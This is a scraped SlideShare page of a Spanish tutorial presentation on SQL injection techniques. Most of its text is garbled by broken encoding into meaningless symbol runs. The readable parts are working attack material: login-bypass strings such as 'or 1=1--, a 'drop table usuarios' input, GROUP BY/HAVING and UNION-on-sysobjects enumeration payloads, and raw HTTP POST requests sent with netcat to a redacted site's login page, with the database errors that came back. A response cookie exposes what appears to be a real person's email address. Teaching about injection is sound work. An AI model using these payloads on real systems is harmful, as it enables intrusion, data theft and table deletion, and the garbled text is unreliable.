SlideShare une entreprise Scribd logo

Tecnicas de sql injection

Alan Resendiz
Alan Resendiz

SQL

Internet
1  sur  44
Télécharger pour lire hors ligne
!
! " #$%& ' ( ) " * + " ,- # . / "0#$% ' " , * ) 1 % )" + ! " , * , ") - ** 2 #$% ' " - " " 3 #$% 4 ) 5 , ! ) % " " 5 " 67" ) " " " . " * 8* " ! 6 . " . 5 9 " , # #$% 4 :) * * + ;7 " / # . ; , " 8< + " " = " " " ) " >; ) - " .> 5 " , " 4 ' " ; " 4 # ! " 8< # ! " 4 ! ' , * ? #$% 4 : " - " " , " @ ' " ' " " A " B * " + % " ' " C ; " A " " ' ) " 5. " "" # 8 " )4 * " & " 7 " " " ( D # ) + = * 6 " " " " " ) & " + 6 9 & 6 & " . " + " " . ! & 9 " " " " 6 ( " " " . " & . " " 4 " " " "& "= 7 " + " ( " 7< " ) " . (( # +
2 ; " " 6 " . " " .& 9 " ) ) * 9 * " " 6 ) + " " " ) " 5 . " & 7 " 6 (& " " " . 4 #$%& " * " 9 " " ( " " " " " $ ! % & ' 5 * " D C 2 . " " ) 4 ) " ) " 6 " . - ' & )4 6 " . 4 " * 9 " * " 9 " ) " " "& 9 " 9 ( " ) 4 ( ) " & " * ) " * . " 4 " " % " + 4 " . 4 #8$ 8% ># 8 . " $ + % . . > * 6 * 6 7 " D C & #8$ 8% + * & 6 " . "& #$% E# $ + % . . F ! * " " " " D " & 9 - ( " ) " " ,- 9 " . & 9 . 4 #$% " 6 + = " " " E#+) " & : + " * <F * 6 " " 51# CB@ + " #: * " CB % . . = " 6 " " #$%BC + #$%C & " " ) 4 " " " "& + .= . " 6 " " 6 " " " +& " D " " >! #$%> " 9 4 " 9 " " . 4 ) ) " 6 " & ( 4 " " . " 4 " "= 9 . & 6 " " #$%2 " ) " " . 4 " . 6 "& 9 " + 9 " " " " 6 6 " 6 . 4 " ( ) * # +, $ ( " " " " " ) " " " 9 - + " * & ) 4 ) 4 " " 9 " = " " = ,:# ! 9 "& 9 " * " & " ) ) 4 9 " 6 " 2 G " E, . * & " 6 " " " " " " F& " * ) " D= " " ) " ) :# & " " " ) " ) " . " 6 " !' " " %51
3 5 ) & " " C & 9 " " . ) " " " ( ) " ) & ) 9 . ) " " 6 " 7 9 9 " ) 4 & " 9 " ) * " " - " . = " 6 6 " # & E! 9 " ) " 6 " 2F " 9 " * ) 4 = " * 9 " ) :# 2 % " 9 " 7" " " & + ) " " " ) " & " * * 9 - " . = " :# " 9 " * & ) = ) 9 " ) " :# 2 G " 1; 8 " " & " * ( ) 9 " 6 " " 6 & 9 = " . " 9 6 6 " . ' " & 6 " 9 " )= " #+) " " - " , " 9 . :# + " * G " 1; , " * D CC = 6 " ) #0#$%& ) 4 ) > " * #$% # 6 3 * G " 1;> H " & " ( = ( " " D CC2 , " " & 67" " " * #$%& " * " 6 " 6 " " " . E#$% F& 9 ( " . " " " " " & " + CC? " #$% @ " & " 9 " " " 9 6 " #+) " G " 1;& + . #$% CCB " * 0 " ) " . . 6 " " " 5 ) . " & " * #$% " 6 " & 9 " " " " I ) & " 9 " ) " * " ) . " - " , " ( #$% # 6 & " 6 ) " 9 " . " " & " . " " "& " " " " 6 4 " " " . " & 9 " " " " " "& ) = " 4 6 " . . " " =" " "- .# / ! 0 ' 9 * & " " * & * " 9 6 9 " " " * " + 9 " " "& " " " ) " 6 "& + " " #$% # 6 " < " .
? # ) " ) + " " #$% ) " & 4 & * " " ) " " ) " " . 9 )6 ) = " ) 4 . & " 9 . " " & " 9 & " & " + ) " ) 4 " E' " " J " " " " #0#$% # 6 & 9 " 6 " " F 8 " " & " . " " ) " " 9 " 6 ) " " " " " " " #0#$% 9 " . & 6 6 " 9 " . " )4 6 & " 7 " #$% 4 %# ) ; . " & ". " * " " " " + " 6 "& 9 4 " " #0#$%& " "* " * & 4 " " "& 9 ) " . 6 " 8 " #0#$% " . " " >#5> + . " = " & "" * " " > > E- KKF 8 " 9 . " = & 9 6 " #5 " ( . " " 6 4 " EIF " #0#$% # 6 & ) " " ) " " " & " ) 7 " " 6 " < " 6 . "& " 4 & " " < " ( 1 ( * $# + ) #0#$% " < " " "& ) = " 1 % )" 6 L"& " 4 " " . " " < " " ) 4 " 5 " " 6 " E#51& 5 ; M& !N #!N& ;'!& F + = " " " ( 9 " 9 " " * " " & " " " ;'! ! + 1 ! 5 " + " 9 " E8" F ( ) " " & " 6 #0#$% # 6 & " " ;'! 332 5 ) " ) " I . " 9 . " ) " + ) 4 " 6 " 9 " " " + * " " " " ) 9 " " ) " " " . & 9 " #0#$% " & *
@ 8 * 6 " ) " " = " " D " 6 #$% E! 4 #5 "" > >F " " " " 7 " + #$% " 9 6 " . " & " 9 ) 7 "& " " 6 "& . ;:,:# " " " ) " " 6 ) 1 + ( & ,#)) ; , 6 % * " >; ! * . " * #$% # 6 > O#$% # 6 " * " " " , ") " - ** " " " > 8" " . * 9 1: < " 6 "& " 9 " " * * " + " " 6 P & " " " " 6= " 9 " " " ,! " #$% # 6 " & " ) . " " " " " " < "& 9 + " " ) < & " " " " " 6 ) " # ) " " " " * " ") " ) ** #$%& 9 " " ) > M . 8< " G " >& " ) " ") ) ** " ) " " " " " >" 6Q * EF> 5 " < = " > M . 8< " G " > E #-1 B303B 022CB0@F " " 9 ( < ) < Q M9 < Q " " < Q < < Q" "9 " + < Q"9 . < Q " " < Q" 6 < Q " + " < Q 6) ! -""" " Q " Q " Q . + " Q " + " Q " +
"2 % & , ; " ) & #$% " . 4 " " 5 " " * " < " " " " " E!%0#$% " : & ; " 0#$% " " * F " 6 "& < " . " " " "& . " " " " & " * * " 6 ( " " " . " % & +% + % ! .# . & / 51; ( . " " 8H:R8 ( 6 " " ,81S ( . " % & ++ + + ) .# . & ' 85;8 ( 6 " ) "& " = " , :! 8 ) " = " 5%;8 ( * " ) " . . " ) * " " % & + + #! .# . & #8%8'; ( " . " " ) " " 9 " "* . 1#8 ; ( . " " ) " " J !,5;8 ( * " 6 " " " + . " " " * " ,8%8;8 ( . " " ) ) " " %! # #! % " " " " " * ( " * " " 9 " " %! # #! A : ( " * ) " 6 " " . " " G 8 8 ( " * " " 9 ) " . " " 9 " 6 " / : ! -S ( " " . " " " " . " " =* " 5H 1/ ( < " 9 ) " "* . : ,8 -S ( " . " " " " " *
B 3 % & T 9 U + 9 TU , " TV . 9 UV + . 9 V . 9 -8;G881 ( " * 6 6 " % R8 ( 1 ( " * . " " ) " " 4 & ! SELECT * FROM Tabla; E8" " 6 6 " " " . " " ) >; ) >F UPADTE Tabla SET password = 'Juajuajua' WHERE user = 'admin' E8" " ( = "" " & 6 F 5 ) & " . 4 #$%& " * 9 4 " " "& " 9 " " * " " " + 4 " #$% " & " " " 4 " ! . * & = " " * 4 " ) & " " " " 4 " " & 4 # ) " & " 6 " & " + " " 9 6 " . " & " " " 6 " 9 9 7 + #$% " " ) "5 # # 6 7 " 9 . ( . * " 9 "& " . " = " . " " >5 9 " H ) " ' 8 >& " 9 * 6 & " " 9 " ) & & " " " #$% ) "&
C " 6 " ) & )4 6 * " " " = " # ) " < 6 " " ) " "& " 6 " ) " . * & " 9 " " * " " 6 " 6 9 " . " 6 " " " < + . " " ) " " " " 6 ) 5 " * " 4 . 4 J . " & ! " # " & " * " " 9 . " " " 7 " " " 8 " & + )4 6 . .J " " " & " " ! " # & ) 4 " " . " " 0 8* " ! 6 . " 0 5 9 " , # #$% 4 0 :) * 0 8< + " " = " 0 ' " ; " , " * & " 4 * 9 * + 9 . ) 4 " . " )4 6 " " * " 6 " ( 6! # ) 7 >#$% 4 > " ) J ) " " " * #0#$%& " 9 . " 9 " & " & 9 " " 9 ) . < 7< 8" " . * 9 " " ) " " " " " " 6 ( " . " " * " 9 6 " " < " * "& " 9 & . " ". * 8" " 6 " " " =* " " 9 + " " " G " * # 6 " 4 " ) " " 5#! ) " " " #0 #$%& " " " G " 9 * " 6 " ) + 4! $ (! & 5 9 " =" " 9 " " " 6 ) & * " ( " " " + .= " " " < 7< "
8 9 + = " " " ) ) " ) 9 ( 6 & " 9 ) 4 " " " 9 " 9 " " " " 8" " ) 9 + = " " "& " 6 " 6 ) " "& ) " " 6 " & " " 6 " 6 ) " " " " 6 " " 6 )& " 9 ) 7 " * " " " ) " " ; " " " * " )& " " : % & " " " & " " " " 6 "& + " ) * " * " " 6 ) . " " ) " + " D :M& " ) 6 " * + = " " " " 9 " " . ) " " ) M. & " . < " " " + " " * " " 8 "& ) . ( ) " " " ) .J " " " * & 6 ( = " = " 6 " . " ) " . " <FORM action=logon/logon.asp method=post> <input type=hidden username=_UserName password=_Password> </FORM> 8" * . . & ) " " " " . " " . 5#! 9 " " 6 " & ) " " E! + J " " ( ) * ; %& 9 . 5#! " < ) " "& . " " " . " " * ; % + 6 6 " " F 8 * 6 + ) ) & * & " . " " + 6 . "= select * from users where username = _UserName and password = _Password 5 ) 9 " " " " & ( " " " . & * " 6 " " " . "II ) " " "= + & " . " " 6 6 4 & " " &
+ ) ) " " ) " < " % " * " " http://www.objetivo.com/libreria.asp?edicion='Noviembre' ! " " & " % = ) " " " " " 9 + " . " " ) + ) " " " .= EN,F ) 7 " " L1 6 ) L " " " 6 . 5#! 9 " 8 " " & + ) ) ) 4 . . ) " " " "* " " " . 9 * 6 " 6 . " select * from numeros_anteriores where edicion = 'Noviembre' " & " 9 ) " " " * " " ) " #$% > 6 >& = " " 9 " . * 7 " " . & + . " + " + 9 ) " " " " " & " " " 9 + #$% 5 6 " " " * " " 4 " " " & " " ) " " + " ! & " " L E' # F ( " " " ) " " ( ) 4 " ) + . % L E' # F " " * #$% # 6 * "& " 9 " 6 9 " 4 " * " 9 6 & " 9 " " " " ) 9 + #$% H " 4 9 = " " " " " . ) ( * . " + ) " " " & " Usuario : An'gel Password : 338xD select * from users where username = 'An'gel' and password = '338xD'
select * from numeros_anteriores where edicion = 'N'oviembre' 8 ) " " " 9 " 9 " " " " " " " #$% # 6 & " 9 " & " 9 " . " . ( " " + " . " username = 'An' edicion = 'N' % . & " . 9 " . " * " "& #$%& * " ( & 4 " " " & " 9 9 9 " " " " + & " . * #$% # 6 5 ) 9 " = " " . + * . " 9 " " " L5 L + L1L II 8 " & . " " 6 " 9 9 " .J 6 6 67" ) " " + " " * " " 4 " * " %& " " " ) "& " " ( 6 & ( . " 8" " * 6 & " 6 9 " " " " " " " " )4 6 + ) 4 " " " " )" " ) " " . " . & " " " " " " " 6 "& " * " 9 " . ) " " 8 * 6 & 9 " " " . " " & " " 6 6 . & ) ) . " .J . 7< + . ) A ) = " ) 7 & " " " " 6 " & 9 " " E84 " " ? >8 # 6 >F " 6 " " ) 7 " " . & 9 + #$% " 6 ) " " 9 "& 9 " < 9 ) " " ) 4 + " ( 7 " " " " ' " ' & " ) 4 > . #$% # 6 " . #$% 4 > EH B * " + " "F ( ( 9 " " * . 6 ) " 9 " . " <
2 1 $ % & ' (#)* +! , - . , / % 0 , , 123 % & - & ) " 6 9 * & " " " & " ) " " " ) ) " * " " " ) " " + "& . " " I " + = " " "& + " 9 " . & " ( .J ) " E! * >. . >F ) " " 9 " ." > . " > ) " " " . " " >% " ' "> )4 6 6 6 7 ! 8 ( . " 6 " " 7 " #$% 4 & " * 9 " . " 9 " " "& 9 . " " ; %& 5#!& & " " " 6 ( 9 " < #$% # 6 ' " 9 " ) "& "& .J " 6 ) & " & 4 & . " + ) 4 * & 6 " " * " EH > % " ' ">F # ) & " > 6 " > + = " " " = " * " 6 & " " . 9 " ) ) + = " " " " " 9 & 4 & " " . " . " " " ) "= 8 " " & . " " 6 ) " " 6 " # ) . " " " " ) " * & 1: ) ) " & " " " " * " * " " & " 6 " 6 " " " ) E8" " ) "& ) 6= " "& " ) 6 " + . F 9 ;:,5 * & 6 " " > "> " + J 9 " " " 6 ( " . 9 " ) ! " " 6 " & . " = & " ( . " 7 " " " 9 . * ) " . " " 7 & "= ) 7 * 9 " =
3 $ (! 6) $ (! ) & 3( " " " " " .= "& : 0% ! . " " & # 86 " : 0% & " , " " + * " .= & ! . " " " " D " 9 " 6 " + ) " < " " + * " " " " " " " . *= " " " - & 9 4 4 4 ) " . " 4 " " " " " " " " " ) "& 9 " "& " . " " 6 " * . / = " + " 5 " " " " & ) ) * "& ) . " " + * "& " " ) 6 " " " ! " " " . " . I ) & " 6 " " * " "& " E> L >F * + " 6 " * " ) 6 " H 7 " " + .J " " " " . " #$% = " " " * 9 " " " . " " . ! " 9 + = " " " " " * " ) * ; % 5#!& * " " = " " 9 6 " 9 " " " 6 "& . " # 5 : + !5##G: , " " . . 5#! 9 ) " + 6 #$% ; ) 7 = " " 9 * " " 6 #$% " < " " . " " " 4 " ! 6 " 4 8" " * . < = " ) 6 ) & . *= ---- Extracto ------------------------------------------- <FORM action=ingreso.asp method=post> <TABLE cellSpacing=1 cellPadding=3 width=440 bgColor=#ffffff border=0> <TBODY> <TR bgColor=#ff0066> <TD><B><FONT face="Arial, Helvetica, sans-serif"
? size=2>Nombre</FONT></B></TD> <TD><B><FONT face="Arial, Helvetica, sans-serif" size=2>Clave</FONT></B></TD></TR> <TR bgColor=#ffcccc> <TD><INPUT name=USERNAME> </TD> <TD><INPUT type=password value="" name=PASSWORD> </TD></TR> <TR align=middle bgColor=#ff0066> <TD colSpan=2><INPUT type=submit value=INGRESAR! name=SUBMIT> </TD></TR></TBODY></TABLE><BR><BR></FORM></TD> <TD vAlign=top align=left width=10> </TD> <TD vAlign=top align=left width=140> <TABLE cellSpacing=0 cellPadding=0 width=140 border=0> <TBODY> ---- Extracto ------------------------------------------- ! " 9 * ( = & ; % " "& + " 4 . 5#! E! " " & . " " F 5 ) & " " 9 ) 4 ( . " " & " 9 6 " " " " " "& " " " 9 * #$% " 6 " " ) " ) . 9 + " 6 " " select * from users where username = 'Angel' and password = '338xD' ! " " 9 " " + "" 9 . ) < " ) " " 9 ( " * 9 = 6 ( 6 ) " " ) * " " ) #$% 4 " I :M& 6 " " * = " " + . " " " + " D . " 'or 1=1— Usuario : 'or 1=1-- ! "" L V W A 47 " "& 9 = " . ) + . select * from users where username = ' or 1=1-- and password = ' or 1=1--
@ 1 9 " 9 " < " " " >: > 9 " & " " " 6 6 " 6 E " 6 " ) F & . + = " " " " " " " . " " 1 ( , 0 4 Usuario : 'OR''=' Password : 'OR''=' 5 4/ ' ) & " " 6 + 6 4 . " > " ">& " " " > 00 > E, ) / F " #$% ( & " " "& #$% 9 . 9 6 . . + # ) " " 7 " . " 6 " 9 . " < + " & " & " 6 " & " ) "& " . " " & ( " 6 . # . 4 & " " " " " " 9 < " " " )4 6 & .J " * >5 > > > " = + . " Usuario : Admin'-- Password : 'or 1=1-- 8 = & " 9 " " = " " " . select * from users where username = 'Admin'-- and password = ' or 1=1-- # " * "= + " . 4 & ) ) + " . 8 " & " 6 " ) 6 " " " > L > E' " F " " + > 00 > E, ) / F 6 9 " + " < "& " ) "
" " > " . "> 6 " ) "& 9 " " " " . ) 4) # $ 7 ! . ! # 5 " " " " " * " < #$% + . & " 6 " ) 9 6 6 . " " ) " * " " " " . 9 " " ' + = " 9 " " & . + & = " * & ) 4 " > < " . > 9 " + * . " + " " " " " " ! " 9 . E' + < " F& " " " "& " " " " " . & . 9 9 " J " " ) " " "& + " 9 " 6 " " " & 4 & " 6 * " " " " " 6 " " " " ) 4 & " 6 " 4 & " + * " " " ) " < 6 . & . " 9 " " " . " " " 6 5 " * " " ) " * " " "& " 6 6 . " " ( " " " 9 D ) "9 " + * " " * " 1 7 ! $ 7 ! . % # " ' ; #$% # 6 & + " 6 " " 6 & " 6 . " " 6 ##$%#8 H8 & " > < > < Q " ) & " ) + > > " " " " ) " " #$% # 6 )Q ) " ) " ) " " * ) ) "& 6 " )4 "& + . ) " " * " 1 ) " " )4 " ) " " " . " 8 4 " " " " " . * .J 8 " " "& " " . * " " " " ) " + 6 " "
B . 6 9# + & % " 9 " , . # 6 & . & " " " D " & " 6 " " " " " E' = " 5 F " " E8 " " * 9 " 9 " . ) " = " & 4 " " 6 " ( + ( & F 5 * " " " " " 9 " 6 " " & 9 6 " & " .J ) . 6 9 J * 9 " & . 4 & " " " " 9 = . " " 6 8 6 " " & M " " * " & 6 ) + #$%& = 4 & & 9 4 " " " Usuario : '; drop table usuarios-- Password : # * & " " 6 . " * EH " >8* " ! 6 . " >F & ) ) ) > " "> " & 9 " & .J " * " * " ' & + " " " & 6 " 6 ) ( " " & 6 5"= + & " 9 , # " " " " 9 " . 7 " " ) "& 9 ) " ( & ) = " + 1 $ % % + 67 & 4/ ) . $ : 3( ) & ! #& ! ) ) " * " " " " ( 7 " #$% 4 & " " " ) " 9 ) " " :,-' :%8 ,- 4 " #$% # 6 . ( D " # ) " " 9 & " . " & " " . 7< & " " " E " 9 ) " " ( = & . ) " 6 "& . " ) " 9 & + " " ) " " " * F
C " 9 " " " 6 ) " + * 1 8 .1) 8 & " 9 6 ( " 6 " & 6 " " " 6 " ) " " " 9 " 6 ) " "& . " + * & " " * 9 " < " " 4 " " & + " " " 6 " " " " + " 6 ( " ! " " " . 4 & " " " ) " > L > E' # F " " D * " " . Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')'., SQL state 37000 in SQLExecDirect in php/db_odbc.inc on line 61 Database error: Invalid SQL: Select * from usuario where (usuario.login=''') ODBC Error: 1 (General Error (The ODBC interface cannot return detailed error messages).) Session halted. - & 6 " 9 * " < " :,-' :)6 " " " * #$% % < ) " " " . " E > )Q ) >F 2 ! " * )Q ) & " 9 " 3 8 ) ) " " ( " > " > ? " " " " > . > - & " 9 6 + " 6 " . * 9 + . " " :,-' 8 )Q ) 1 3 % ) 010.8#* - "3.9$ (")-#) :;<< 123
----- Fragmento ----------------------------------------- <?php /* * Session Management for PHP3 * * Copyright (c) 1998-2000 XXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * Modified by XXXXXXXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * * $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $ */ class DB_Sql { var $Host = ""; var $Database = ""; var $User = ""; var $Password = ""; var $UseODBCCursor = 0; var $Link_ID = 0; var $Query_ID = 0; var $Record = array(); var $Row = 0; var $Errno = 0; var $Error = ""; ----- Fragmento ----------------------------------------- - " " " " >" " > 6 " " 6 " " 6 ) " X " + X! "" " " . & " 9 " ( " " " . " " 6 " " " " * & . " 6 4 * . 9 " * & " "& 9 * 9 9 6 " #$%& A " + 6 & " " . " 6 " " " . " " < 9 " 6 " * " " " ) E8 " " = ) " )Q ) F : ) & * / ! :M& 6 " " 9 + #$% + " * 6 " ) " " ) " "& * . + " " " ) 9 4 * " + . & " 9 4 " " ) " 6 + .
8 " " 6 " " " " ( & " ( 7 " #$% 4 & " " ! " 9 " 6 " " " * & . " 6 4 6 " " & " " 9 " " ) "& J " " ( 9 " " " ) " " ) < 9 6 7 " ;;! " 6 " # " + ) " " ' % E8 M " " B * " + % " ' "F& 9 " " " ) 4 E5 . 6 & " . F " . . = " - " 9 " 6 " " " " 6 " * " 7 " ;;! " )4 6 & " < " "& ( 9 D " 6 " < & " " " 6 < & " . * nc -vv www.objetivo.com 80 < sentencias.txt ' " ' + " * " " ;;! * & ( " ** * E8 " " * # +1 & " 8 9 F& . . " ) )4 6 . " ) " + " D " * " E5 . ) " " " F& " 6 " " 8" * " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 34 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Angel&txtPassword=Angel Y Y Y H . " >! "" >
Y * . " Y H . " > " > * . " - & " . 9 " " * !:#; ) " " ** 6 < 9 4 < & " " ) " " " . ! " 9 " " . + " ) 9 " " " " ) " + ) > L > E' " F * & 6 6 " & ) ( " ) " * ) ( 6 * ! " " 6 " " " " " " #$% 9 " " E 6 .& . )+& F 8 )4 6 " " ( > > " " ' " " " " > "> #$%& " * " 6 " * " 9 6 9 #$% E 4 6 < & " 4 :%8 ,-F ) " " " " )" 6 "& " 4 " * 6 " " 6 " " H 6 " " " 4 < 6 " " " * " ( " 7 !:#; 9 " ( " 6= ( " ) 4 6 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 46 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27having+1%3D1--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L 6 . V 00 E8 Z 6 .[ Z2, 00F
2 1 . $ " = 3 )*1( 5*'> ! ) 6 " " " . " " " 6 !:#;& " 9 " " " ) " > "> " " " " ;;! % ) " " ( * " " 9 6 " 6 " ! + 4 ' # Z ] ! + ' Z2- , " ! " Z25 O O 8" [ Z V # . . Z2, & ' Z ' E ! 7 " " Z B F ! 7 " " Z C U + Z28 T Z2' 5 ) ! [ " Z - 0 " 0 ^ - M # " Z?' Q " Q :MK 9 " ( " 4 < & " " " " ( " 6= & + 6 9 " ! " 6 " 6 = 9 " 6= " " " 9 " 6 " 9 " & + 6 " 9 " " " " " ) 8 " nc -vv www.objetivo.com 80 < Injection.txt > result.html - 6 " 9 " 9 . " " + > 6 .>& ) " 6 " * " 9 4 " " ! " " " & . " & " 7 * " 9 " " * " ) " " " " + " H " 9 4 " "
3 Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 ! * KK " " " & " )" 6 9 " 4 " & 6 :,-' #$% # 6 " 6 6 ) ) ) " " ( * " " . . E # 5 :#F& "= ) 7 " E " ,F 5 9 " ) ) & " * " = & " 6 6 " " * 4 < + ( " " * " " "& " " " ) # 5 :# H " 9 = " * " 6 !:#; POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 71 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx =COUNTRYNAME=Argentina txtUsuario=%27group+by+usuarios.UserID+having+1%3D1-- &txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " H + L. )+ " " " , 6 . V 00 % . 4 6 " = & 6 " " . " Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UID' is invalid in the select
? list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 6 ( " " " & " 9 " " > 6 .> " 6 ( " >. )+> " ) + " , ) # 5 :#& " " , # . " .= & " " " " " + " " 9 ) # 5 :# ( " > . " > * " " "& " > 6 > " ) " + 8" " = * 'group by usuarios.UserID,usuarios.UID having 1=1-- #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Nombre' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85 * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre having 1=1— #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Email' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85
@ * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre, usuarios.Email having 1=1-- #! ! * HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date: Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23 GMT Connection: close Location: PaginaPersonal.asp Content-Length: 139 Content-Type: text/html Set-Cookie: xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun, 16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private Object Moved This object may be found here. :M 9 =& " )" 6 " + ) " . > " " 8 > 8 9 " " 9 & ) " . * ) " . " > > " ( " #8%8'; . E/ " 1 F A=4 " 9 " " !:#; ;;! 1: " & " 9 " " " 6 . " " " " ) " "& 4 6 9 #$% 6 + E8" " L. )+ " " " ,& " " ,& " " 1 ) & " " 8 6 . V 00F , " & " " 9 & * " * " " " " ) & ( " " " . " ' & . " " " " " . " 9 ;:,:# " " ) " " #8%8'; . & " "& 9 + 9 " " " " #8%8'; " + 9 * " " II 6 " 4 < " # 9 " * " " . SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x AND campo5=y
( 7 E8" " >. )+> + > 6 .>F " ) = " " ) " > >& > > + > 2>& " ) = " < " > ?> E, * " " 9 " . * >#8%8'; _ A : ` a> " = " & " * ) " + " " " 7 F " " " " " " ) ( . " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 297 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3 D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na me%3D%27usuarios%27+order+by+1+desc%29+order+by+1-- &txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y Y H + "L " ) & & & * "+" )4 " & "+" " ) V) VL " "L ) E" ) * "+" )4 " & "+" " ) V) VL " "L )+ " F )+ 00 - 9 " " " III H "& ( " + > "> = ) " 9 " " # * " ( " " . & " " + % . " 1 :1 " . + 9 " " " & " " " " ) " " " #S#:-b8';# + #S#':% 1# " > ,> * 9 " ) " 6 ( " ;:! E8 " " F % " " " ( 1 6 9 " " 6 " #8%8'; 7 " "& "= * 9 ) 6 " "
B 4 ;:!& " 9 . " " ;:,:# " " ) )4 6 " !:#; 6 ;:! F % " 9 = " ) " " " . " " " & Ups' union select b.name,1,1,1 from sysobjects a, syscolumns b where a.id=b.id and a.name='usuarios' and b.colorder = 48 -- 7 " & 4 " 4 " + J . " " " E! 4 9 " " " " " ) ( " > >F ! 6 " " " 7 " 4 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UserSubPLUSDate' to a column of data type int. /Login.asp, line 85 :M& 6 " :,-' " " 9 ) ) # 5 :# " > " # )!% #, > % . " & 6 " . ;:! + " . " " " " ) " + " :- .# ! #& + 5 ) & & + " 6 ( 9 " " " . 6 " & ) " " ) " ) + " "& " 9 ) 7 " " 6 . " 9 " " % . " & " " " #$% > 1 :1>& D * ># EF> " # ) " 1 :1 " " " " >) " "> 9 " * . 4 #$%& " 9 " J " * "& " ) " J 6 " ) " " ! 4 & " " J 1 :1& " " " > >& ) " " " " " ) " " ! " * # EF& " ) " 7 " . " "
C 5 9 " " . ) " " 6 " " ( " 4 "& & " + ; " " 6 " 4 < + 7 " * 9 . " . " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 82 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu arios--&txtPassword=Angel Y Y Y H 9 6 " >! "" > Y * . " Y H + L " " E ,F& & & * " "00 6 ( "& . 4 " " = 1 6 !:#; " " 6 )4 6 & ) " " " . < Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average 